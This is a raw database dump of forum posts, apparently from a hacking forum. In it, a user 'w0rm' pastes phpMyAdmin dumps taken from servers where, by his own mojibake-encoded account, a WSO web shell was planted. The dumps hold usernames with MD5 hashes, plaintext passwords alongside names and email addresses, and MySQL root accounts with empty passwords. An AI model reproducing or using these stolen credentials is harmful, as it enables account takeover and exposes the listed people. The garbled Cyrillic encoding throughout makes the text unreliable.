\'0000-00-00 00:00:00\'),\n(23, \'moderator6\', \'aeb08d57711888eca74f46ff29786ef4\', \'\', \'0000-00-00 00:00:00\'),\n(24, \'moderator7\', \'e2b8223f32ca013952cd9ba3715be8eb\', \'\', \'2008-04-25 14:13:04\'),\n(25, \'alexandra\', \'e3a0bc021ddd77d43917d64b10e30568_locked_\', \'e3a0bc021ddd77d43917d64b10e30568\', \'2008-01-10 13:21:38\'),\n(26, \'andrey\', \'827ccb0eea8a706c4c34a16891f84e7b\', \'\', \'0000-00-00 00:00:00\'),\n(27, \'stepenko\', \'9cb60ff7b51a92906b1a876b83c83b55_locked_\', \'\', \'0000-00-00 00:00:00\'),\n(28, \'kovalchuk\', \'916404b9f23fc4efb48bb00254540a8a_locked_\', \'\', \'2008-04-02 13:28:19\'),\n(29, \'moderator8\', \'cbb992661c4430d1f3419aff73326f17\', \'\', \'0000-00-00 00:00:00\'),\n(30, \'moderator9\', \'12ad18636e440aaaf3029172cbe02e1f\', \'\', \'0000-00-00 00:00:00\'),\n(31, \'osipova\', \'c67e09ac4c42f2708ebb77da2f5fbff8\', \'\', \'0000-00-00 00:00:00\'),\n(32, \'yana\', \'4495843fa5e22a941135cc44b8e6db7a_locked_\', \'\', \'2007-08-07 15:17:09\'),\n(33, \'antonina\', \'8ef7bf48ab11440bb0df8a1b6a1adab8\', \'\', \'2007-03-03 10:02:03\'),\n(35, \'mila\', \'e9dc5f3c6a2cf43d8a8f25a57ccafff3\', \'\', \'2009-03-11 15:15:59\'),\n(34, \'moda\', \'0d5f1ae6e61c87ff73a8dbcdec28f901\', \'0d5f1ae6e61c87ff73a8dbcdec28f901\', \'2007-08-13 18:59:52\'),\n(36, \'marish\', \'1ce3a4ed2e2ceebd3c1eb3064d247f59\', \'\', \'2007-09-07 11:04:33\'),\n(37, \'Moderator10\', \'749a1b560e0f8e180f75552215f94b88\', \'\', \'2007-10-02 11:36:43\'),\n(40, \'cover\', \'1fe5b4c3e1819c0124c20a304d2a5503\', \'\', \'2009-10-26 18:32:32\'),\n(39, \'sixonic\', \'fdd2e7a1e01f9d80b8acbd6afeb92764\', \'\', \'2007-10-26 10:19:29\'),\n(42, \'svetlana\', \'2b5e6d66d27edcca802ee8ce55966dfc\', \'\', \'2008-03-21 10:44:52\'),\n(44, \'Vitaly\', \'9caab021b268e833a881414b54b446ae\', \'\', \'2008-07-08 16:50:37\'),\n(41, \'softwood\', \'8f544c07e9633a9e44e39078dab8c7b4\', \'\', \'2009-07-22 12:07:22\'),\n(43, \'jass\', \'5b4e7a318cc5541d6fe8dd1698344339\', \'5b4e7a318cc5541d6fe8dd1698344339\', \'2008-08-21 14:42:44\'),\n(48, \'playadmin\', \'60b013b8462ec85ac93436b73998c831\', \'\', \'2008-07-18 15:25:20\'),\n(45, \'Kotos\', \'1d7005a6e39ba5015f5ea924bf23034e\', \'1d7005a6e39ba5015f5ea924bf23034e\', \'2008-07-04 14:25:21\'),\n(46, \'lazey \', \'64d299a04e7ab83e8029cca56a300bb4_locked\', \'\', \'2011-04-15 18:11:53\'),\n(49, \'pav3741\', \'cf012cbdefeda184938c9e7a2275fafa\', \'\', \'2009-06-22 17:56:17\'),\n(47, \'tanya\', \'11135fb6461fbdc91eea2090c19043d3\', \'\', \'0000-00-00 00:00:00\'),\n(50, \'nightfall\', \'8c4a9e98cf2c261d046cebdba5eeaa35\', \'\', \'2008-08-13 12:53:46\'),\n(51, \'ivaschenko\', \'c7e89dfd0780b4dc28b2588e5c6d723f\', \'c7e89dfd0780b4dc28b2588e5c6d723f\', \'2008-08-13 13:03:52\'),\n(52, \'belka\', \'77153487d8aad4598b9ad2dc2b73e0bc\', \'\', \'2009-05-14 12:34:13\'),\n(53, \'mpopov\', \'3806fd2591ebd913469b3a9c641fbb5a\', \'\', \'2009-02-20 17:01:18\'),\n(54, \'kdobryvecher\', \'90f30bbc3c78fb9427fed979df353d51_locked_\', \'\', \'2010-02-18 12:28:02\'),\n(56, \'Dita\', \'5ac7a30784818df26801f4d72e335a8f\', \'\', \'2011-03-10 17:29:21\'),\n(55, \'dimam\', \'cd2ba77b6d2a89ef3040a27c1596c944\', \'\', \'2010-02-27 14:35:51\'),\n(60, \'musienko\', \'d69f477d82a96f6d3183ec01350d9872\', \'d69f477d82a96f6d3183ec01350d9872\', \'2011-10-17 11:58:36\'),\n(58, \'kuharchuk\', \'7c989bafe7a08b89c0a11e9ce21fc113\', \'\', \'2010-08-03 09:59:53\'),\n(57, \'anet\', \'37eef497a59874b8cc2cb15acc0692ea\', \'\', \'2009-04-24 11:26:06\'),\n(59, \'Galina\', \'b0c0a814e3c0e68da4df1f2c816ce265\', \'\', \'2009-11-04 11:04:00\'),\n(62, \'Ira\', \'7207862f7579d3e30ec0b5c1c6506700\', \'\', \'0000-00-00 00:00:00\'),\n(61, \'golik\', \'f2c7e6883067373205a10604cc878d34\', \'\', \'2012-01-22 20:36:08\'),\n(64, \'t-oksana\', \'c61183364bbb3a54fe8f95036a04ac5b\', \'\', \'2014-04-03 06:18:04\'),\n(63, \'m.adamchuk\', \'7d9f2cfa6c435f3f32712179bb5587ab\', \'\', \'2009-10-21 13:26:50\'),\n(65, \'svoloch\', \'1fe5b4c3e1819c0124c20a304d2a5503\', \'\', \'2011-02-10 16:36:44\'),\n(66, \'furlet\', \'cf392b4711b78b6bff7fa4f0e0887754\', \'cf392b4711b78b6bff7fa4f0e0887754\', \'2011-06-06 16:30:12\'),\n(67, \'Roma\', \'9f71560c432f7657b215840cfd6068fe\', \'\', \'2010-09-09 16:20:14\'),\n(69, \'Smorodinova_L\', \'eb2e1832165dc32dccbb6c9fc20ba05e\', \'\', \'2013-02-25 08:12:38\'),\n(68, \'anna_seo\', \'6e3b8e8298a1b7c48f941ef1a0da6255\', \'\', \'2012-06-11 14:20:51\'),\n(70, \'pashura\', \'b13d27280cd0d8320d46c13d44a1fb81\', \'\', \'2014-08-06 12:22:15\'),\n(71, \'xena\', \'d8ffe0099bb7e2c98f8e6e5c37baffa2\', \'\', \'2012-02-17 13:50:31\'),\n(72, \'3vil\', \'276d04854e682c9f108aeca1381faf02\', \'\', \'2011-07-14 13:01:10\'),\n(73, \'random\', \'c4ca4238a0b923820dcc509a6f75849b\', \'b77b6e45cd9c2998c6e461a46218847b\', \'2011-09-15 18:17:52\');\n[/php]', 1, 0, '50.7.210.37', 0, 1, 0, 0, 0), (1366, 1227, 1346, 'w0rm', 1, '', 1407430356, 'wso ÿðûøтÑÂѠøх ÑÂõрòõрþü, open_base_dir ò ûюñþü ÑÂûучðõ фуýúцøѠphp тõ ò cgi рðñþтðть ýõ ñуôõт, ýþ nginx у ýøх úðú тþ ÑÂтрðýýþ ýðÑÂтрþÑÂý чтþ pl ÑÂúрøÿты ÑÂúðчøòðютÑÂѠð ýõ øÑÂÿþûýÑÂÑŽÑ‚ÑÂÑÂ.\r\n\r\nýðôþ ñы ÿрþñрутøть:\r\n\r\n[php]\r\n-- phpMyAdmin SQL Dump\r\n-- version 2.10.0.2\r\n-- http://www.phpmyadmin.net\r\n-- \r\n-- Ã¥þÑÂÑ‚: 127.0.0.3\r\n-- ÒрõüѠÑÂþ÷ôðýøÑÂ: ÃÂòó 07 2014 ó., 19:47\r\n-- ÒõрÑÂøѠÑÂõрòõрð: 5.5.30\r\n-- ÒõрÑÂøѠPHP: 5.4.13\r\n\r\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\r\n\r\n-- \r\n-- Ñð÷ð ôðýýых: `bsql`\r\n-- \r\n\r\n-- --------------------------------------------------------\r\n\r\n-- \r\n-- áтруúтурð тðñûøцы `users`\r\n-- \r\n\r\nCREATE TABLE `users` (\r\n `id` int(11) NOT NULL AUTO_INCREMENT,\r\n `login` varchar(40) NOT NULL DEFAULT \'\',\r\n `passw` varchar(100) NOT NULL DEFAULT \'\',\r\n `cookie` varchar(32) NOT NULL DEFAULT \'\',\r\n `vtime` datetime NOT NULL DEFAULT \'0000-00-00 00:00:00\',\r\n PRIMARY KEY (`id`)\r\n) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT=\'î÷õры\' AUTO_INCREMENT=77 ;\r\n\r\n-- \r\n-- Ãâ€Ã°Ã¼Ã¿ ôðýýых тðñûøцы `users`\r\n-- \r\n\r\nINSERT INTO `users` (`id`, `login`, `passw`, `cookie`, `vtime`) VALUES \r\n(1, \'master\', \'b0be1e547f7a5ee3ffd555428b019d9c\', \'\', \'2014-08-07 07:29:43\'),\r\n(2, \'misha\', \'1b6c9d1b5e84873fbaca267708d16469\', \'\', \'2014-07-18 15:00:00\'),\r\n(3, \'grisha\', \'deada030e20b7a089e278d27bd875bd4_locked_\', \'\', \'0000-00-00 00:00:00\'),\r\n(4, \'sharun\', \'da44c4cfb061610b74c646fed8343a8b\', \'\', \'0000-00-00 00:00:00\'),\r\n(5, \'mbkom\', \'82efc341d8cbe574b745025aa527568f\', \'\', \'2009-09-21 14:46:51\'),\r\n(6, \'sulya\', \'0d3d201e551d3b54ab61d6d2ed1b5c25_locked_\', \'\', \'0000-00-00 00:00:00\'),\r\n(7, \'moder1\', \'2837260221cb881b04a0575549c75579\', \'\', \'2010-04-26 22:17:02\'),\r\n(8, \'moderator1\', \'f409aa34367789f30b5850b63b5df870\', \'\', \'2009-06-01 10:21:35\'),\r\n(9, \'akella\', \'f67fd85522b4082671feae41509ad7eb\', \'f67fd85522b4082671feae41509ad7eb\', \'2010-05-18 20:17:01\'),\r\n(10, \'maria\', \'f3717533a90a8ecb1de730050beab052\', \'f3717533a90a8ecb1de730050beab052\', \'2009-02-11 16:56:14\'),\r\n(11, \'avizenou\', \'983ae9a305b6569a90fbe2a6ea92da3f\', \'\', \'0000-00-00 00:00:00\'),\r\n(12, \'erezbahat\', \'6f1e91b448716344ba24bc47b88b8d87_locked_\', \'\', \'0000-00-00 00:00:00\'),\r\n(14, \'julia\', \'4079284fd6664377f6e8247fc1ad9397\', \'\', \'0000-00-00 00:00:00\'),\r\n(15, \'zomb\', \'b77b6e45cd9c2998c6e461a46218847b\', \'\', \'2013-11-26 07:56:22\'),\r\n(16, \'moderator2\', \'dc883c6ad08f850811d7289c3f65860d\', \'\', \'0000-00-00 00:00:00\'),\r\n(17, \'moderator3\', \'c5640ac37b3e2d7de786976a6ec8c493\', \'c5640ac37b3e2d7de786976a6ec8c493\', \'2007-09-17 11:09:57\'),\r\n(18, \'marina\', \'9df79be2ca0795b0641e8aa3d3f21ffc\', \'\', \'0000-00-00 00:00:00\'),\r\n(19, \'yevgeniy\', \'e25e799a4a8a51135d4501ba92f79537\', \'\', \'0000-00-00 00:00:00\'),\r\n(20, \'irina-sem\', \'44ba16d827ca38e7ff99bf5c811a4017\', \'\', \'2010-09-24 11:01:07\'),\r\n(21, \'moderator4\', \'99631b6d76c4e99300b067033dd32257\', \'\', \'2008-08-28 11:40:17\'),\r\n(22, \'moderator5\', \'b93818091ad6826e8537122de00fb535\', \'\', \'0000-00-00 00:00:00\'),\r\n(23, \'moderator6\', \'aeb08d57711888eca74f46ff29786ef4\', \'\', \'0000-00-00 00:00:00\'),\r\n(24, \'moderator7\', \'e2b8223f32ca013952cd9ba3715be8eb\', \'\', \'2008-04-25 14:13:04\'),\r\n(25, \'alexandra\', \'e3a0bc021ddd77d43917d64b10e30568_locked_\', \'e3a0bc021ddd77d43917d64b10e30568\', \'2008-01-10 13:21:38\'),\r\n(26, \'andrey\', \'827ccb0eea8a706c4c34a16891f84e7b\', \'\', \'0000-00-00 00:00:00\'),\r\n(27, \'stepenko\', \'9cb60ff7b51a92906b1a876b83c83b55_locked_\', \'\', \'0000-00-00 00:00:00\'),\r\n(28, \'kovalchuk\', \'916404b9f23fc4efb48bb00254540a8a_locked_\', \'\', \'2008-04-02 13:28:19\'),\r\n(29, \'moderator8\', \'cbb992661c4430d1f3419aff73326f17\', \'\', \'0000-00-00 00:00:00\'),\r\n(30, \'moderator9\', \'12ad18636e440aaaf3029172cbe02e1f\', \'\', \'0000-00-00 00:00:00\'),\r\n(31, \'osipova\', \'c67e09ac4c42f2708ebb77da2f5fbff8\', \'\', \'0000-00-00 00:00:00\'),\r\n(32, \'yana\', \'4495843fa5e22a941135cc44b8e6db7a_locked_\', \'\', \'2007-08-07 15:17:09\'),\r\n(33, \'antonina\', \'8ef7bf48ab11440bb0df8a1b6a1adab8\', \'\', \'2007-03-03 10:02:03\'),\r\n(35, \'mila\', \'e9dc5f3c6a2cf43d8a8f25a57ccafff3\', \'\', \'2009-03-11 15:15:59\'),\r\n(34, \'moda\', \'0d5f1ae6e61c87ff73a8dbcdec28f901\', \'0d5f1ae6e61c87ff73a8dbcdec28f901\', \'2007-08-13 18:59:52\'),\r\n(36, \'marish\', \'1ce3a4ed2e2ceebd3c1eb3064d247f59\', \'\', \'2007-09-07 11:04:33\'),\r\n(37, \'Moderator10\', \'749a1b560e0f8e180f75552215f94b88\', \'\', \'2007-10-02 11:36:43\'),\r\n(40, \'cover\', \'1fe5b4c3e1819c0124c20a304d2a5503\', \'\', \'2009-10-26 18:32:32\'),\r\n(39, \'sixonic\', \'fdd2e7a1e01f9d80b8acbd6afeb92764\', \'\', \'2007-10-26 10:19:29\'),\r\n(42, \'svetlana\', \'2b5e6d66d27edcca802ee8ce55966dfc\', \'\', \'2008-03-21 10:44:52\'),\r\n(44, \'Vitaly\', \'9caab021b268e833a881414b54b446ae\', \'\', \'2008-07-08 16:50:37\'),\r\n(41, \'softwood\', \'8f544c07e9633a9e44e39078dab8c7b4\', \'\', \'2009-07-22 12:07:22\'),\r\n(43, \'jass\', \'5b4e7a318cc5541d6fe8dd1698344339\', \'5b4e7a318cc5541d6fe8dd1698344339\', \'2008-08-21 14:42:44\'),\r\n(48, \'playadmin\', \'60b013b8462ec85ac93436b73998c831\', \'\', \'2008-07-18 15:25:20\'),\r\n(45, \'Kotos\', \'1d7005a6e39ba5015f5ea924bf23034e\', \'1d7005a6e39ba5015f5ea924bf23034e\', \'2008-07-04 14:25:21\'),\r\n(46, \'lazey \', \'64d299a04e7ab83e8029cca56a300bb4_locked\', \'\', \'2011-04-15 18:11:53\'),\r\n(49, \'pav3741\', \'cf012cbdefeda184938c9e7a2275fafa\', \'\', \'2009-06-22 17:56:17\'),\r\n(47, \'tanya\', \'11135fb6461fbdc91eea2090c19043d3\', \'\', \'0000-00-00 00:00:00\'),\r\n(50, \'nightfall\', \'8c4a9e98cf2c261d046cebdba5eeaa35\', \'\', \'2008-08-13 12:53:46\'),\r\n(51, \'ivaschenko\', \'c7e89dfd0780b4dc28b2588e5c6d723f\', \'c7e89dfd0780b4dc28b2588e5c6d723f\', \'2008-08-13 13:03:52\'),\r\n(52, \'belka\', \'77153487d8aad4598b9ad2dc2b73e0bc\', \'\', \'2009-05-14 12:34:13\'),\r\n(53, \'mpopov\', \'3806fd2591ebd913469b3a9c641fbb5a\', \'\', \'2009-02-20 17:01:18\'),\r\n(54, \'kdobryvecher\', \'90f30bbc3c78fb9427fed979df353d51_locked_\', \'\', \'2010-02-18 12:28:02\'),\r\n(56, \'Dita\', \'5ac7a30784818df26801f4d72e335a8f\', \'\', \'2011-03-10 17:29:21\'),\r\n(55, \'dimam\', \'cd2ba77b6d2a89ef3040a27c1596c944\', \'\', \'2010-02-27 14:35:51\'),\r\n(60, \'musienko\', \'d69f477d82a96f6d3183ec01350d9872\', \'d69f477d82a96f6d3183ec01350d9872\', \'2011-10-17 11:58:36\'),\r\n(58, \'kuharchuk\', \'7c989bafe7a08b89c0a11e9ce21fc113\', \'\', \'2010-08-03 09:59:53\'),\r\n(57, \'anet\', \'37eef497a59874b8cc2cb15acc0692ea\', \'\', \'2009-04-24 11:26:06\'),\r\n(59, \'Galina\', \'b0c0a814e3c0e68da4df1f2c816ce265\', \'\', \'2009-11-04 11:04:00\'),\r\n(62, \'Ira\', \'7207862f7579d3e30ec0b5c1c6506700\', \'\', \'0000-00-00 00:00:00\'),\r\n(61, \'golik\', \'f2c7e6883067373205a10604cc878d34\', \'\', \'2012-01-22 20:36:08\'),\r\n(64, \'t-oksana\', \'c61183364bbb3a54fe8f95036a04ac5b\', \'\', \'2014-04-03 06:18:04\'),\r\n(63, \'m.adamchuk\', \'7d9f2cfa6c435f3f32712179bb5587ab\', \'\', \'2009-10-21 13:26:50\'),\r\n(65, \'svoloch\', \'1fe5b4c3e1819c0124c20a304d2a5503\', \'\', \'2011-02-10 16:36:44\'),\r\n(66, \'furlet\', \'cf392b4711b78b6bff7fa4f0e0887754\', \'cf392b4711b78b6bff7fa4f0e0887754\', \'2011-06-06 16:30:12\'),\r\n(67, \'Roma\', \'9f71560c432f7657b215840cfd6068fe\', \'\', \'2010-09-09 16:20:14\'),\r\n(69, \'Smorodinova_L\', \'eb2e1832165dc32dccbb6c9fc20ba05e\', \'\', \'2013-02-25 08:12:38\'),\r\n(68, \'anna_seo\', \'6e3b8e8298a1b7c48f941ef1a0da6255\', \'\', \'2012-06-11 14:20:51\'),\r\n(70, \'pashura\', \'b13d27280cd0d8320d46c13d44a1fb81\', \'\', \'2014-08-06 12:22:15\'),\r\n(71, \'xena\', \'d8ffe0099bb7e2c98f8e6e5c37baffa2\', \'\', \'2012-02-17 13:50:31\'),\r\n(72, \'3vil\', \'276d04854e682c9f108aeca1381faf02\', \'\', \'2011-07-14 13:01:10\'),\r\n(73, \'random\', \'c4ca4238a0b923820dcc509a6f75849b\', \'b77b6e45cd9c2998c6e461a46218847b\', \'2011-09-15 18:17:52\');\r\n[/php]', 1, 0, '50.7.210.37', 0, 2, 0, 0, 0), (1367, 1227, 1365, 'w0rm', 1, '', 1407430447, 'õщõ ю÷õры:\n[php]\n-- phpMyAdmin SQL Dump\n-- version 2.10.0.2\n-- http://www.phpmyadmin.net\n-- \n-- Ã¥þÑÂÑ‚: 127.0.0.3\n-- ÒрõüѠÑÂþ÷ôðýøÑÂ: ÃÂòó 07 2014 ó., 19:55\n-- ÒõрÑÂøѠÑÂõрòõрð: 5.5.30\n-- ÒõрÑÂøѠPHP: 5.4.13\n\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\n\n-- \n-- Ñð÷ð ôðýýых: `istat`\n-- \n\n-- --------------------------------------------------------\n\n-- \n-- áтруúтурð тðñûøцы `istat_users`\n-- \n\nCREATE TABLE `istat_users` (\n `ID` int(4) unsigned NOT NULL AUTO_INCREMENT,\n `group_ID` int(4) unsigned NOT NULL DEFAULT \'0\',\n `Login` varchar(255) NOT NULL DEFAULT \'\',\n `Pass` varchar(255) NOT NULL DEFAULT \'\',\n `FIO` varchar(255) NOT NULL DEFAULT \'\',\n `Info` varchar(255) NOT NULL DEFAULT \'\',\n `active` int(1) unsigned NOT NULL DEFAULT \'0\',\n `SiteName` varchar(255) NOT NULL,\n `URL` varchar(255) NOT NULL,\n `pInfo` varchar(255) NOT NULL,\n PRIMARY KEY (`ID`)\n) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=14 ;\n\n-- \n-- Ãâ€Ã°Ã¼Ã¿ ôðýýых тðñûøцы `istat_users`\n-- \n\nINSERT INTO `istat_users` (`ID`, `group_ID`, `Login`, `Pass`, `FIO`, `Info`, `active`, `SiteName`, `URL`, `pInfo`) VALUES \n(1, 1, \'Zomb\', \'123456\', \'âðрðúðýúþò áõрóõù\', \'zomb@ukr.net\', 1, \'\', \'\', \'\'),\n(2, 3, \'kryackazyablick\', \'cricaza\', \'áÑÂôрþ îûøÑÂ\', \'syadro@ukr.net\', 1, \'\', \'\', \'\'),\n(3, 1, \'Sulya\', \'123\', \'áуûьöõýúþ ÃÂûõúÑÂðýôр\', \'sulya@kiev.ukr.net\', 0, \'\', \'\', \'\'),\n(4, 4, \'Misha\', \'Bhnkfx\', \'Üøхðøû Øртûðч\', \'mair_1966@ukr.net\', 1, \'\', \'\', \'\'),\n(5, 3, \'Masha\', \'Vfif\', \'ÚþрÑÂðúþòð ÜðрøÑÂ\', \'mariya@kiev.ukr.net\', 1, \'\', \'\', \'\'),\n(6, 5, \'Marina\', \'Vfhbyf\', \'Óуртþòõýúþ Üðрøýð\', \'marinag@kiev.ukr.net\', 0, \'\', \'\', \'\'),\n(7, 3, \'Kira\', \'Bhf\', \'ÚþñыûøýÑÂúðѠØрøýð\', \'\', 0, \'\', \'\', \'\'),\n(8, 3, \'kula\', \'Rekf\', \'Úуûðúþòð ÃÂýтþýøýð\', \'kula@ukr.net\', 1, \'\', \'\', \'\'),\n(9, 3, \'Kovalchuk\', \'z83h5h5\', \'Úþòðûьчуú Øрøýð\', \'ira_belaya@ukr.net\', 1, \'\', \'\', \'\'),\n(11, 2, \'kustov\', \'Fraza.ua\', \'ÚуÑÂтþò Òøтðûøù\', \'kustov@gmail.com\', 1, \'äрð÷ð\', \'http://fraza.ua\', \'Ñðртõр\'),\n(12, 1, \'admin\', \'1234567890\', \'âõÑÂтþòыù ðôüøý\', \'\', 1, \'\', \'\', \'\'),\n(13, 1, \'pav3741\', \'123456\', \'q\', \'\', 1, \'\', \'\', \'\');\n\n[/php]\n\nø÷ üуÑÂúуûð:\n[php]\n-- phpMyAdmin SQL Dump\n-- version 2.10.0.2\n-- http://www.phpmyadmin.net\n-- \n-- Ã¥þÑÂÑ‚: 127.0.0.3\n-- ÒрõüѠÑÂþ÷ôðýøÑÂ: ÃÂòó 07 2014 ó., 19:56\n-- ÒõрÑÂøѠÑÂõрòõрð: 5.5.30\n-- ÒõрÑÂøѠPHP: 5.4.13\n\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\n\n-- \n-- Ñð÷ð ôðýýых: `mysql`\n-- \n\n-- --------------------------------------------------------\n\n-- \n-- áтруúтурð тðñûøцы `user`\n-- \n\nCREATE TABLE `user` (\n `Host` char(60) COLLATE utf8_bin NOT NULL DEFAULT \'\',\n `User` char(16) COLLATE utf8_bin NOT NULL DEFAULT \'\',\n `Password` char(41) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT \'\',\n `Select_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Insert_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Update_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Delete_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Create_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Drop_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Reload_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Shutdown_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Process_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `File_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Grant_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `References_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Index_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Alter_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Show_db_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Super_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Create_tmp_table_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Lock_tables_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Execute_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Repl_slave_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Repl_client_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Create_view_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Show_view_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Create_routine_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Alter_routine_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Create_user_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Event_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Trigger_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Create_tablespace_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `ssl_type` enum(\'\',\'ANY\',\'X509\',\'SPECIFIED\') CHARACTER SET utf8 NOT NULL DEFAULT \'\',\n `ssl_cipher` blob NOT NULL,\n `x509_issuer` blob NOT NULL,\n `x509_subject` blob NOT NULL,\n `max_questions` int(11) unsigned NOT NULL DEFAULT \'0\',\n `max_updates` int(11) unsigned NOT NULL DEFAULT \'0\',\n `max_connections` int(11) unsigned NOT NULL DEFAULT \'0\',\n `max_user_connections` int(11) unsigned NOT NULL DEFAULT \'0\',\n `plugin` char(64) COLLATE utf8_bin DEFAULT \'\',\n `authentication_string` text COLLATE utf8_bin,\n PRIMARY KEY (`Host`,`User`)\n) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT=\'Users and global privileges\';\n\n-- \n-- Ãâ€Ã°Ã¼Ã¿ ôðýýых тðñûøцы `user`\n-- \n\nINSERT INTO `user` (`Host`, `User`, `Password`, `Select_priv`, `Insert_priv`, `Update_priv`, `Delete_priv`, `Create_priv`, `Drop_priv`, `Reload_priv`, `Shutdown_priv`, `Process_priv`, `File_priv`, `Grant_priv`, `References_priv`, `Index_priv`, `Alter_priv`, `Show_db_priv`, `Super_priv`, `Create_tmp_table_priv`, `Lock_tables_priv`, `Execute_priv`, `Repl_slave_priv`, `Repl_client_priv`, `Create_view_priv`, `Show_view_priv`, `Create_routine_priv`, `Alter_routine_priv`, `Create_user_priv`, `Event_priv`, `Trigger_priv`, `Create_tablespace_priv`, `ssl_type`, `ssl_cipher`, `x509_issuer`, `x509_subject`, `max_questions`, `max_updates`, `max_connections`, `max_user_connections`, `plugin`, `authentication_string`) VALUES \n(0x6c6f63616c686f7374, 0x726f6f74, \'\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x6e706e65772e756b722e6e6574, 0x726f6f74, \'\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x3132372e302e302e31, 0x726f6f74, \'\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x25, 0x726f6d6d6978, 0x2a33313036364238454546424434333630393342373630453533344542444241344539393146423345, \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'Y\', \'Y\', \'N\', \'N\', \'Y\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x3132372e302e302e32, 0x726f6f74, \'\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'N\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x3132372e302e302e33, 0x726f6f74, \'\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'N\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x3132372e302e302e34, 0x7265706c, 0x2a37393431464232324233373543453633343335394334313646374137413938374246424544334145, \'N\', \'N\', \'N\', \'N\', \'N\', 